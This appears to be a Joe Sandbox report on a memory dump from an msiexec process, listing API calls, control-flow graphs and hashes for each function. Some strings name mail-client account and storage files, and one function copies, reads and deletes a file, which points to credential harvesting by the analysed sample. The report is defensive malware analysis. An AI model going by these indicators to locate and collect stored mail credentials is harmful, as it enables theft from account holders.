22f5abdb-22f5abe0 323->330 324->318 326->334 341 22f5aafd-22f5ab08 call 22f56368 326->341 327->310 333 22f5aac0 327->333 328->303 329->310 329->330 330->302 333->326 334->310 335->334 341->334
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: DecodePointer
                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                            • API String ID: 3527080286-3064271455
                                                                                            • Opcode ID: 612e59e784aee948890282ca126f54e5b50b089bdf9b38cd8631b8f5fbd3562a
                                                                                            • Instruction ID: 36032140da980a46f17c9a53045085e57dd0e56c045bcb27f09893908f876954
                                                                                            • Opcode Fuzzy Hash: 612e59e784aee948890282ca126f54e5b50b089bdf9b38cd8631b8f5fbd3562a
                                                                                            • Instruction Fuzzy Hash: B6514E71A00B09EBEF04DFA4D6885ADBBB7FF49314F104685E791A7264C7398A38C754

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D1B
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22F51D37
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D4B
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D58
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D72
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D7D
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                            • String ID:
                                                                                            • API String ID: 1454806937-0
                                                                                            • Opcode ID: f854d4cbbc06da7d928c43b68b9f1e3af3ad3e390cfdf0c81541a7f8eb8bf760
                                                                                            • Instruction ID: 537e104e9e1fc8083ab1ec72832000d9cfea86834cbe0c0dc40036205628f540
                                                                                            • Opcode Fuzzy Hash: f854d4cbbc06da7d928c43b68b9f1e3af3ad3e390cfdf0c81541a7f8eb8bf760
                                                                                            • Instruction Fuzzy Hash: 17210EB294221CBFD7109BA4CC8CFEBBAACEF18754F000965FA16D2144D7749E968B70

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 361 22f59492-22f594ef GetConsoleCP 362 22f594f5-22f59511 361->362 363 22f59632-22f59644 call 22f52ada 361->363 365 22f59513-22f5952a 362->365 366 22f5952c-22f5953d call 22f57c19 362->366 368 22f59566-22f59575 call 22f579e6 365->368 373 22f59563-22f59565 366->373 374 22f5953f-22f59542 366->374 368->363 375 22f5957b-22f5959b WideCharToMultiByte 368->375 373->368 376 22f59609-22f59628 374->376 377 22f59548-22f5955a call 22f579e6 374->377 375->363 378 22f595a1-22f595b7 WriteFile 375->378 376->363 377->363 383 22f59560-22f59561 377->383 381 22f595b9-22f595ca 378->381 382 22f5962a-22f59630 GetLastError 378->382 381->363 384 22f595cc-22f595d0 381->384 382->363 383->375 385 22f595d2-22f595f0 WriteFile 384->385 386 22f595fe-22f59601 384->386 385->382 387 22f595f2-22f595f6 385->387 386->362 388 22f59607 386->388 387->363 389 22f595f8-22f595fb 387->389 388->363 389->386
                                                                                            APIs
                                                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,22F59C07,?,00000000,?,00000000,00000000), ref: 22F594D4
                                                                                            • __fassign.LIBCMT ref: 22F5954F
                                                                                            • __fassign.LIBCMT ref: 22F5956A
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 22F59590
                                                                                            • WriteFile.KERNEL32(?,?,00000000,22F59C07,00000000,?,?,?,?,?,?,?,?,?,22F59C07,?), ref: 22F595AF
                                                                                            • WriteFile.KERNEL32(?,?,?,22F59C07,00000000,?,?,?,?,?,?,?,?,?,22F59C07,?), ref: 22F595E8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1324828854-0
                                                                                            • Opcode ID: 12df29dd5b461cb735673cd095240215aa9b3d60e2ec5bf81bed63f292f5177a
                                                                                            • Instruction ID: ff653a6b637315476e57ad563575647df118c89e1b9305c976d87dbf0fe01f51
                                                                                            • Opcode Fuzzy Hash: 12df29dd5b461cb735673cd095240215aa9b3d60e2ec5bf81bed63f292f5177a
                                                                                            • Instruction Fuzzy Hash: 4C51B571900345AFDB14CFA8C895AEEFBF9EF08300F14451AEA51E7285D6309965CFA0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 390 22f53370-22f533b5 call 22f53330 call 22f537a7 395 22f533b7-22f533c9 390->395 396 22f53416-22f53419 390->396 397 22f53439-22f53442 395->397 398 22f533cb 395->398 396->397 399 22f5341b-22f53428 call 22f53790 396->399 400 22f533d0-22f533e7 398->400 404 22f5342d-22f53436 call 22f53330 399->404 402 22f533fd 400->402 403 22f533e9-22f533f7 call 22f53740 400->403 407 22f53400-22f53405 402->407 411 22f5340d-22f53414 403->411 412 22f533f9 403->412 404->397 407->400 410 22f53407-22f53409 407->410 410->397 413 22f5340b 410->413 411->404 414 22f53443-22f5344c 412->414 415 22f533fb 412->415 413->404 416 22f53486-22f53496 call 22f53774 414->416 417 22f5344e-22f53455 414->417 415->407 422 22f53498-22f534a7 call 22f53790 416->422 423 22f534aa-22f534c6 call 22f53330 call 22f53758 416->423 417->416 418 22f53457-22f53466 call 22f5bbe0 417->418 427 22f53483 418->427 428 22f53468-22f53480 418->428 422->423 427->416 428->427
                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 22F5339B
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 22F533A3
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 22F53431
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 22F5345C
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 22F534B1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 1170836740-1018135373
                                                                                            • Opcode ID: 2c12651c929795b6d601fdd6b1795c3d0e9ce679018ab3c75dbcbbe56aaac35d
                                                                                            • Instruction ID: e3140960bf1ab87b15e87b3340c3bbdd69593cbf16d9a17e3dba13ba14d22a57
                                                                                            • Opcode Fuzzy Hash: 2c12651c929795b6d601fdd6b1795c3d0e9ce679018ab3c75dbcbbe56aaac35d
                                                                                            • Instruction Fuzzy Hash: 6A41C335E04308ABCF01CF6CC980A9EBBB7AF45328F108195EB159F255D735DA25CB91

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 22F59221: _free.LIBCMT ref: 22F5924A
                                                                                            • _free.LIBCMT ref: 22F592AB
                                                                                              • Part of subcall function 22F5571E: HeapFree.KERNEL32(00000000,00000000,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?), ref: 22F55734
                                                                                              • Part of subcall function 22F5571E: GetLastError.KERNEL32(?,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?,?), ref: 22F55746
                                                                                            • _free.LIBCMT ref: 22F592B6
                                                                                            • _free.LIBCMT ref: 22F592C1
                                                                                            • _free.LIBCMT ref: 22F59315
                                                                                            • _free.LIBCMT ref: 22F59320
                                                                                            • _free.LIBCMT ref: 22F5932B
                                                                                            • _free.LIBCMT ref: 22F59336
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                            • Instruction ID: d7218650f79aa14c48c8cd05bbbc2f1898ae6eb4f75b4e865561ccdd7323e0ba
                                                                                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                            • Instruction Fuzzy Hash: C2118E31540B0CFADE38ABB1EE45FCF7B9FAF14700F400824AB99B6092DA24B5258791

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 472 22f58821-22f5883a 473 22f58850-22f58855 472->473 474 22f5883c-22f5884c call 22f59341 472->474 476 22f58857-22f5885f 473->476 477 22f58862-22f58886 MultiByteToWideChar 473->477 474->473 481 22f5884e 474->481 476->477 479 22f5888c-22f58898 477->479 480 22f58a19-22f58a2c call 22f52ada 477->480 482 22f588ec 479->482 483 22f5889a-22f588ab 479->483 481->473 485 22f588ee-22f588f0 482->485 486 22f588ad-22f588bc call 22f5bf20 483->486 487 22f588ca-22f588db call 22f556d0 483->487 489 22f588f6-22f58909 MultiByteToWideChar 485->489 490 22f58a0e 485->490 486->490 499 22f588c2-22f588c8 486->499 487->490 500 22f588e1 487->500 489->490 493 22f5890f-22f5892a call 22f55f19 489->493 494 22f58a10-22f58a17 call 22f58801 490->494 493->490 504 22f58930-22f58937 493->504 494->480 501 22f588e7-22f588ea 499->501 500->501 501->485 505 22f58971-22f5897d 504->505 506 22f58939-22f5893e 504->506 508 22f5897f-22f58990 505->508 509 22f589c9 505->509 506->494 507 22f58944-22f58946 506->507 507->490 512 22f5894c-22f58966 call 22f55f19 507->512 510 22f58992-22f589a1 call 22f5bf20 508->510 511 22f589ab-22f589bc call 22f556d0 508->511 513 22f589cb-22f589cd 509->513 517 22f58a07-22f58a0d call 22f58801 510->517 524 22f589a3-22f589a9 510->524 511->517 526 22f589be 511->526 512->494 527 22f5896c 512->527 513->517 518 22f589cf-22f589e8 call 22f55f19 513->518 517->490 518->517 530 22f589ea-22f589f1 518->530 529 22f589c4-22f589c7 524->529 526->529 527->490 529->513 531 22f589f3-22f589f4 530->531 532 22f58a2d-22f58a33 530->532 533 22f589f5-22f58a05 WideCharToMultiByte 531->533 532->533 533->517 534 22f58a35-22f58a3c call 22f58801 533->534 534->494
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,22F56FFD,00000000,?,?,?,22F58A72,?,?,00000100), ref: 22F5887B
                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,22F58A72,?,?,00000100,5EFC4D8B,?,?), ref: 22F58901
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 22F589FB
                                                                                            • __freea.LIBCMT ref: 22F58A08
                                                                                              • Part of subcall function 22F556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22F55702
                                                                                            • __freea.LIBCMT ref: 22F58A11
                                                                                            • __freea.LIBCMT ref: 22F58A36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1414292761-0
                                                                                            • Opcode ID: 18fdd99cb48f37c8e18de7b7f235eb008411012daa653d5b2898c4744eb1ecd7
                                                                                            • Instruction ID: e9e0cb8667e72003d4adb4e3fd08e15bec71119b65d00b8804184a77815c56b7
                                                                                            • Opcode Fuzzy Hash: 18fdd99cb48f37c8e18de7b7f235eb008411012daa653d5b2898c4744eb1ecd7
                                                                                            • Instruction Fuzzy Hash: 0851D372610316BBEB198E64CD44EAF7BABEF50754F514669FF04D6180EB34ECA0C690

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • _strlen.LIBCMT ref: 22F51607
                                                                                            • _strcat.LIBCMT ref: 22F5161D
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,22F5190E,?,?,00000000,?,00000000), ref: 22F51643
                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,22F5190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 22F5165A
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,22F5190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 22F51661
                                                                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,22F5190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 22F51686
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                            • String ID:
                                                                                            • API String ID: 1922816806-0
                                                                                            • Opcode ID: 907de23da09e7e2ace1e2abc207a6e222fead6b823f08cbf42d75b5208bf2b0c
                                                                                            • Instruction ID: dbb93eb3173834c9b5cb61709e10c36945577192d1523029cff0aea21d3322cb
                                                                                            • Opcode Fuzzy Hash: 907de23da09e7e2ace1e2abc207a6e222fead6b823f08cbf42d75b5208bf2b0c
                                                                                            • Instruction Fuzzy Hash: E621C536900304BBDB049F68DC84EFF77B9EF88720F24441AEA04AB285EB34A55197A5

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 22F51038
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22F5104B
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 22F51061
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 22F51075
                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 22F51090
                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 22F510B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 3594823470-0
                                                                                            • Opcode ID: 88accb53f6a1f4905ccf450a78eeacfca70e2ae6fca998db52e53db983b5c7ed
                                                                                            • Instruction ID: 68ae111dec8897bf5681c0347cf8acde47113a83acd8c1e457d8fcb094910238
                                                                                            • Opcode Fuzzy Hash: 88accb53f6a1f4905ccf450a78eeacfca70e2ae6fca998db52e53db983b5c7ed
                                                                                            • Instruction Fuzzy Hash: A121B236900318ABCF14DB64DD48EDF377AEF44724F104696EA59A31B5DE30AAA6CF40
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,22F53518,22F523F1,22F51F17), ref: 22F53864
                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 22F53872
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 22F5388B
                                                                                            • SetLastError.KERNEL32(00000000,?,22F53518,22F523F1,22F51F17), ref: 22F538DD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                            • String ID:
                                                                                            • API String ID: 3852720340-0
                                                                                            • Opcode ID: 0962288e2fbf6ff63a510eb0c7b30a3e35d031a8d8d3fcbc8a0627a1e4e153ba
                                                                                            • Instruction ID: 88aab048833cf25f3ccd0998ea170fd9947bee6922d9b1c027df5814d617176d
                                                                                            • Opcode Fuzzy Hash: 0962288e2fbf6ff63a510eb0c7b30a3e35d031a8d8d3fcbc8a0627a1e4e153ba
                                                                                            • Instruction Fuzzy Hash: 1201D433A4DB117EA60C2A7D6D84E167B97DF15F7AB200629EB309D1D5EF1948398340
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,22F56C6C), ref: 22F55AFA
                                                                                            • _free.LIBCMT ref: 22F55B2D
                                                                                            • _free.LIBCMT ref: 22F55B55
                                                                                            • SetLastError.KERNEL32(00000000,?,?,22F56C6C), ref: 22F55B62
                                                                                            • SetLastError.KERNEL32(00000000,?,?,22F56C6C), ref: 22F55B6E
                                                                                            • _abort.LIBCMT ref: 22F55B74
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 3160817290-0
                                                                                            • Opcode ID: 28dbf37c55caccfba7e8270e7fe4bfbb75396c2caa1be5c82fcd3371507d5831
                                                                                            • Instruction ID: 600221286b5169c2b48b9dfd01df0731cf34375e1a866c7448c206d9564e166e
                                                                                            • Opcode Fuzzy Hash: 28dbf37c55caccfba7e8270e7fe4bfbb75396c2caa1be5c82fcd3371507d5831
                                                                                            • Instruction Fuzzy Hash: 44F0A4B2645F00BBD61627346D4CF1E7A6B8FD1F75B250524FF34A6185EE2885324264
                                                                                            APIs
                                                                                              • Part of subcall function 22F51E89: lstrlenW.KERNEL32(?,?,?,?,?,22F510DF,?,?,?,00000000), ref: 22F51E9A
                                                                                              • Part of subcall function 22F51E89: lstrcatW.KERNEL32(?,?,?,22F510DF,?,?,?,00000000), ref: 22F51EAC
                                                                                              • Part of subcall function 22F51E89: lstrlenW.KERNEL32(?,?,22F510DF,?,?,?,00000000), ref: 22F51EB3
                                                                                              • Part of subcall function 22F51E89: lstrlenW.KERNEL32(?,?,22F510DF,?,?,?,00000000), ref: 22F51EC8
                                                                                              • Part of subcall function 22F51E89: lstrcatW.KERNEL32(?,22F510DF,?,22F510DF,?,?,?,00000000), ref: 22F51ED3
                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 22F5122A
                                                                                              • Part of subcall function 22F5173A: _strlen.LIBCMT ref: 22F51855
                                                                                              • Part of subcall function 22F5173A: _strlen.LIBCMT ref: 22F51869
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                            • API String ID: 4036392271-1520055953
                                                                                            • Opcode ID: b46787ead22ce2441d0ee4026aac25c04d987f223c89513558baf61e6948ecc4
                                                                                            • Instruction ID: b5cab3a4377c95881a0d97db93ee0f247c93e093e74211c17cc7b1287fc71861
                                                                                            • Opcode Fuzzy Hash: b46787ead22ce2441d0ee4026aac25c04d987f223c89513558baf61e6948ecc4
                                                                                            • Instruction Fuzzy Hash: F6218179E103086AEB1497A4EC81BEE733AEF90B14F000556F704EB2E4E6B16D948759
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,22F54AEA,?,?,22F54A8A,?,22F62238,0000000C,22F54BBD,00000000,00000000), ref: 22F54B59
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 22F54B6C
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,22F54AEA,?,?,22F54A8A,?,22F62238,0000000C,22F54BBD,00000000,00000000,?,22F52082), ref: 22F54B8F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 34f0d4fc1fc09c2611c24ebdf78155c2c8dd37ea7e86cfcd6725def38b4887d8
                                                                                            • Instruction ID: 6782b2f976f03cfafa47d32a7b034db32cdc8ffd0722fa8a4cc64e538d3211ee
                                                                                            • Opcode Fuzzy Hash: 34f0d4fc1fc09c2611c24ebdf78155c2c8dd37ea7e86cfcd6725def38b4887d8
                                                                                            • Instruction Fuzzy Hash: FBF0C232A42708BFEB019F94C808FAEBFBAEF04755F000164FE05A6148DB348A61CB90
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 22F5715C
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 22F5717F
                                                                                              • Part of subcall function 22F556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22F55702
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 22F571A5
                                                                                            • _free.LIBCMT ref: 22F571B8
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 22F571C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 336800556-0
                                                                                            • Opcode ID: c7593d6bcd802701e3930a1540d80fb739c624631650e62bc0e9aee51828a596
                                                                                            • Instruction ID: a6c1bdf4fd7a698df2da75d00c9d9e8bbd043654a5230c735f4f1ffb1eb01a60
                                                                                            • Opcode Fuzzy Hash: c7593d6bcd802701e3930a1540d80fb739c624631650e62bc0e9aee51828a596
                                                                                            • Instruction Fuzzy Hash: E60184736063157F37210ABA5C88DBB7A6FDEC2EA43200569FF04C720CEA648C2285B0
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,22F5636D,22F55713,00000000,?,22F52249,?,?,22F51D66,00000000,?,?,00000000), ref: 22F55B7F
                                                                                            • _free.LIBCMT ref: 22F55BB4
                                                                                            • _free.LIBCMT ref: 22F55BDB
                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F55BE8
                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F55BF1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free
                                                                                            • String ID:
                                                                                            • API String ID: 3170660625-0
                                                                                            • Opcode ID: a1cb5a474f6d6bd77c92cd8f657c16084b9f6f634a334a643243b07fce233f34
                                                                                            • Instruction ID: 266fa80fa2cd48674871580b461d1e8c62cf84300e7fb9e4d9296f70913fab03
                                                                                            • Opcode Fuzzy Hash: a1cb5a474f6d6bd77c92cd8f657c16084b9f6f634a334a643243b07fce233f34
                                                                                            • Instruction Fuzzy Hash: 570128B3245F01B7920617381D88E1F7A6BDFC2B747210124FF35E6146EE28C9364260
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,22F510DF,?,?,?,00000000), ref: 22F51E9A
                                                                                            • lstrcatW.KERNEL32(?,?,?,22F510DF,?,?,?,00000000), ref: 22F51EAC
                                                                                            • lstrlenW.KERNEL32(?,?,22F510DF,?,?,?,00000000), ref: 22F51EB3
                                                                                            • lstrlenW.KERNEL32(?,?,22F510DF,?,?,?,00000000), ref: 22F51EC8
                                                                                            • lstrcatW.KERNEL32(?,22F510DF,?,22F510DF,?,?,?,00000000), ref: 22F51ED3
                                                                                            Memory Dump Source
